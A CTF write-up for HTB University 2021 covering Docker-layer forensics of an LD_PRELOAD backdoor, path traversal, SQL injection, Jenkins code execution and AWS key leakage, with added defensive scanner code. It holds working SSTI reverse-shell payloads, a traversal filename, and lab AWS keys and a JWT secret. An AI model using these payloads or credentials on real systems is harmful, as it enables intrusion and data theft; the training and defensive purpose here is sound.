HTB University CTF 2021 - Quals
Peel back the layers
Category
Forensics
Challenge
An unknown maintainer managed to push an update to one of our public docker images. Our SOC team reported suspicious traffic coming from some of our steam factories ever since. The update got retracted making us unable to investigate further. We are concerned that this might refer to a supply-chain attack. Could you investigate?
Docker Image: steammaintainer/gearrepairimage
Solution
- pull the docker image
$ docker pull steammaintainer/gearrepairimage
- view the image layers
$ docker history steammaintainer/gearrepairimage --no-trunc
- notice that the environment variable LD_PRELOAD was modified
ENV LD_PRELOAD=/usr/share/lib/librs.so
- to extract and view this file, dump the layers as tar
$ docker save steammaintainer/gearrepairimage -o layers.tar
- run strings on the shared library file to get the flag
$ strings 0aec9568b70f59cc149be9de4d303bc0caf0ed940cd5266671300b2d01e47922/usr/share/lib/librs.so
...
libc.so.6
GLIBC_2.2.5
u/UH
HTB{1_r3H
4lly_l1kH
3_st34mpH
unk_r0b0H
ts!!!}
REMOTE_ADDR
REMOTE_PORT
/bin/sh
...
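As an added defender-side check (not part of the original writeup), the script below opens a `docker save` tarball, reads each image's config JSON and flags loader environment variables such as LD_PRELOAD together with the build steps in the image history that introduced them. The tarball is constructed in memory to mirror the modified ENV line above; the file names and the `audit_image_tar` / `build_sample_tar` functions are this example's own.

```python
import io
import json
import tarfile

# Dynamic-loader variables that let a single image layer hijack every process in the container.
LOADER_ENV = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")

def audit_image_tar(tar_bytes):
    """Parse a `docker save` tarball held in memory and return one finding per
    loader-related ENV entry, with the history steps (created_by) that set it."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tf:
        manifest = json.load(tf.extractfile("manifest.json"))
        for image in manifest:
            cfg = json.load(tf.extractfile(image["Config"]))
            history = cfg.get("history", [])
            for kv in cfg.get("config", {}).get("Env", []):
                key = kv.split("=", 1)[0]
                if key not in LOADER_ENV:
                    continue
                steps = [h.get("created_by", "") for h in history
                         if key in h.get("created_by", "")]
                findings.append({"image": image.get("RepoTags", []),
                                 "env": kv, "introduced_by": steps})
    return findings

def build_sample_tar():
    """Constructed stand-in for `docker save` output: a manifest plus one image
    config whose ENV was changed the way the challenge image's was."""
    config = {
        "config": {"Env": ["PATH=/usr/local/sbin:/usr/bin",
                           "LD_PRELOAD=/usr/share/lib/librs.so"]},
        "history": [
            {"created_by": "/bin/sh -c #(nop) ADD file:EXAMPLE in / "},
            {"created_by": "/bin/sh -c #(nop)  ENV LD_PRELOAD=/usr/share/lib/librs.so",
             "empty_layer": True},
        ],
    }
    manifest = [{"Config": "config.json", "Layers": [],
                 "RepoTags": ["steammaintainer/gearrepairimage:latest"]}]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, obj in (("manifest.json", manifest), ("config.json", config)):
            data = json.dumps(obj).encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()
```

Run against a real `layers.tar` by reading the file into bytes; an ENV that points at a library shipped only by the suspicious layer is the signal to pull that layer apart.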
Flag
HTB{1_r34lly_l1k3_st34mpunk_r0b0ts!!!}
Slippy
Category
Web
Challenge
You’ve found a portal for a firmware upgrade service, responsible for the deployment and maintenance of rogue androids hunting humans outside the tractor city. The question is… what are you going to do about it?
Challenge source code was given.
Solution
- upon reviewing the source code, a utility function blindly saves files based on the filename in the request
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
- the Flask App was also running in debug mode
- leveraging the above two vulnerabilities, it is possible to overwrite the source code of the application and the application reloads with the new source code
- update util.py to return the flag and upload it with the right filename in the request form
filename=../../../../../../../../app/application/util.py
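Added example (not from the challenge source): the save logic quoted above next to a hardened version that rejects any name carrying path components and then confirms the resolved path is still inside the upload directory. `safe_save_path` and `demo` are this example's names; `demo` runs both on the traversal filename used in this solution and on a benign name.

```python
import os
import tempfile

def vulnerable_save_path(filename):
    """The challenge's logic: the client-supplied name is joined verbatim, so
    '../' segments (or an absolute name) walk out of the temp directory."""
    tmp = tempfile.gettempdir()
    return os.path.join(tmp, filename)

def safe_save_path(filename, base_dir=None):
    """Hardened version: accept only a bare file name, then verify the resolved
    path is still under base_dir (defence in depth against symlinks there)."""
    base = os.path.realpath(base_dir or tempfile.gettempdir())
    normalized = filename.replace("\\", "/")
    if normalized in ("", ".", "..") or "/" in normalized:
        raise ValueError("refusing filename with path components: %r" % filename)
    candidate = os.path.realpath(os.path.join(base, normalized))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes upload directory")
    return candidate

def demo():
    """Compare both functions on the traversal name from the writeup and on a
    benign upload name; returns a dict of boolean outcomes."""
    traversal = "../../../../../../../../app/application/util.py"
    tmp = os.path.realpath(tempfile.gettempdir())
    vuln = os.path.realpath(vulnerable_save_path(traversal))
    results = {"vulnerable_escapes": os.path.commonpath([tmp, vuln]) != tmp}
    try:
        safe_save_path(traversal)
        results["safe_rejects"] = False
    except ValueError:
        results["safe_rejects"] = True
    results["safe_ok"] = os.path.basename(safe_save_path("firmware_v2.bin")) == "firmware_v2.bin"
    return results
```

The second half of the bug, debug mode, is what turned the overwrite into code execution: the reloader picked up the replaced util.py, so the fix is both the path check and `debug=False` in production.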
Flag
HTB{1_r34lly_l1k3_st34mpunk_r0b0ts!!!}
GoodGames (user)
Category
Fullpwn
Challenge
An IP address was given.
Solution
- running an nmap scan on the given IP showed port 80 open
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.48
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
- the only interesting functionality in the web application is login
- running SQLMap on the login request reveals that the email parameter is vulnerable to injection
- dump the database using SQLMap
Database: main
Table: user
[1 entry]
+----+-------+---------------------+----------------------------------+
| id | name  | email               | password                         |
+----+-------+---------------------+----------------------------------+
| 1  | admin | admin@goodgames.htb | 2b22337f218b2d82dfc3b6f77e7cb8ec |
+----+-------+---------------------+----------------------------------+
- crack the password hash using hashcat
$ hashcat --show -m 0 hash.txt /usr/share/wordlists/rockyou.txt
2b22337f218b2d82dfc3b6f77e7cb8ec:superadministrator
- logging in as admin and navigating the website reveals a new subdomain - http://internal-administration.goodgames.htb/
- login with the same credentials in the internal administration website
- the only functionality in this website allows changing the admin’s name
- testing for various vulnerabilities in this input field finally leads to Server-side Template Injection (SSTI)
{{7*'7'}}
- exploit the command execution vulnerability to get a reverse shell and read the flag
{{config.__class__.__init__.__globals__['os'].popen('echo <rev-shell-base64> | base64 -d | bash').read()}}
Flag
HTB{7h4T_w45_Tr1cKy_1_D4r3_54y}
Object (user)
Category
Fullpwn
Challenge
An IP address was given.
Solution
- running an nmap scan on the given IP address showed Jenkins running on port 8080
- register an account on Jenkins and create a pipeline to get code execution on the Windows machine
- read the user.txt
type C:\Users\oliver\Desktop\user.txt
- view the output in the Console Output tab in Jenkins
Flag
HTB{c1_cd_c00k3d_up_1337!}
Epsilon
Category
Cloud
Challenge
An IP address was given.
Solution
- running an nmap scan on the given IP showed ports 22, 80 and 5000 open
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
| http-git:
|   10.129.96.99:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Updating Tracking API # Please enter the commit message for...
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
|_http-title: Costume Shop
- .git is available in the website running on port 80
- use GitTools to find the AWS Keys and server.py in one of the commits
...
aws_access_key_id='AQLA5M37BDN6FJP76TDC',
aws_secret_access_key='OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A',
region_name='us-east-1',
endpoint_url='http://cloud.epsilon.htb')
...
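Added example, not part of the writeup: a small history scanner that looks for the credential shapes leaked here (an AWS access key id / secret pair passed as keyword arguments, and a hard-coded `secret=` string) across every version of every file, because a later commit that deletes a key does not remove it from `.git`. The sample commits, placeholder key values and the `scan_history` / `scan_blob` names are constructed for this example.

```python
import re

# Shapes of the secrets recovered from the Epsilon repository and lambda code.
PATTERNS = {
    "aws_access_key_id": re.compile(r"aws_access_key_id\s*=\s*['\"]([A-Z0-9]{20})['\"]"),
    "aws_secret_access_key": re.compile(r"aws_secret_access_key\s*=\s*['\"]([A-Za-z0-9/+=]{40})['\"]"),
    # \b keeps this from double-matching the "_secret_" inside aws_secret_access_key
    "hardcoded_secret": re.compile(r"\bsecret\s*=\s*['\"]([^'\"]{8,})['\"]"),
}

def redact(value):
    """Keep only the first and last four characters so reports can be shared."""
    return value[:4] + "*" * (len(value) - 8) + value[-4:]

def scan_blob(path, text):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                findings.append({"file": path, "line": lineno,
                                 "type": kind, "value": redact(m.group(1))})
    return findings

def scan_history(commits):
    """commits: list of (commit_id, {path: content}), oldest first. Every file
    version is scanned, not just the tip, which is exactly where GitTools looks."""
    findings = []
    for cid, files in commits:
        for path, text in files.items():
            for f in scan_blob(path, text):
                f["commit"] = cid
                findings.append(f)
    return findings

# Constructed sample history; the placeholders only imitate the length and alphabet of real keys.
FAKE_KEY_ID = "AKIAEXAMPLEEXAMPLE01"          # 20 chars
FAKE_SECRET = "EXAMPLE" + "0" * 33            # 40 chars
SAMPLE_COMMITS = [
    ("c0ffee1", {"track_api.py": "s3 = boto3.client('s3',\n"
                                 "    aws_access_key_id='%s',\n"
                                 "    aws_secret_access_key='%s',\n"
                                 "    region_name='us-east-1')\n" % (FAKE_KEY_ID, FAKE_SECRET)}),
    ("c0ffee2", {"track_api.py": "s3 = boto3.client('s3', region_name='us-east-1')  # key removed, still in history\n",
                 "lambda_function.py": "secret='PLACEHOLDER-jwt-signing-secret'\n"}),
]
```

The finding in c0ffee1 survives the removal in c0ffee2, which is the reason exposed `.git` directories are treated as a full credential leak rather than a source-code leak.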
- server.py, recovered with GitTools, contains the code running on port 5000 and requires the secret to forge an admin JWT
- use the above AWS Keys to get the lambda code, which contains the secret
// commands
$ aws --endpoint-url=http://cloud.epsilon.htb/ lambda list-functions
$ aws --endpoint-url=http://cloud.epsilon.htb/ lambda get-function --function-name costume_shop_v1
$ wget "http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code" -O code.zip
// content of lambda_function.py
...
secret='RrXCv`mrNe!K!4+5`wYq'
...
- use the secret to forge a JWT impersonating admin and login as admin
- from server.py, it is seen that the order() function contains the dangerous call
tmpl=render_template_string(message,costume=costume)
- exploit SSTI in the above to get a reverse shell and read the flag
{{config.__class__.__init__.__globals__['os'].popen('echo <rev-shell-base64> | base64 -d | bash').read()}}
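Both the GoodGames name field and the Epsilon order() message end up inside a Jinja2 template, so one detector covers both. Added example (not from either challenge): it URL-decodes submitted field values, looks for template delimiters, and classifies what is inside as an arithmetic probe like the `{{7*'7'}}` above or as an object walk through `__class__`/`__globals__`/`popen`. The sample fields and the `classify_value` / `scan_fields` names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Jinja2 expression and statement delimiters.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# The classic confirmation probe: a number multiplied by a string or number.
PROBE_MATH = re.compile(r"\d+\s*\*\s*['\"]?\d+")
# Attribute-walk gadgets from the payloads in this writeup; `config` is the Flask
# config object, which no legitimate user-supplied text has a reason to reference.
GADGETS = ("__class__", "__init__", "__globals__", "__subclasses__",
           "__mro__", "__builtins__", "popen", "config")

def classify_value(value):
    """Return the reasons a single submitted value looks like SSTI ([] if clean)."""
    decoded = unquote_plus(value)
    exprs = TEMPLATE_EXPR.findall(decoded)
    if not exprs:
        return []
    reasons = ["template-expression"]
    body = " ".join(exprs)
    if PROBE_MATH.search(body):
        reasons.append("arithmetic-probe")
    hits = [g for g in GADGETS if g in body]
    if hits:
        reasons.append("object-walk:" + ",".join(hits))
    return reasons

def scan_fields(fields):
    """fields: iterable of (field_name, raw_value) as captured by a WAF or an
    application-level request logger. Returns one alert per suspicious value."""
    alerts = []
    for name, raw in fields:
        reasons = classify_value(raw)
        if reasons:
            alerts.append({"field": name, "reasons": reasons})
    return alerts

# Constructed sample capture: the admin-name change and a costume-shop order message.
SAMPLE_FIELDS = [
    ("name", "Alice"),
    ("name", "{{7*'7'}}"),
    ("name", "%7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D"
             ".popen%28%27id%27%29.read%28%29%7D%7D"),
    ("message", "Thanks for the {{costume}} order"),
]
```

On the server side the fix is the same for both applications: render a fixed template and pass the user string as a variable (`render_template_string("{{ message }}", message=message)`) instead of rendering the user string itself.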
Flag
HTB{l4mbd4_l34ks_4r3_fun!!!}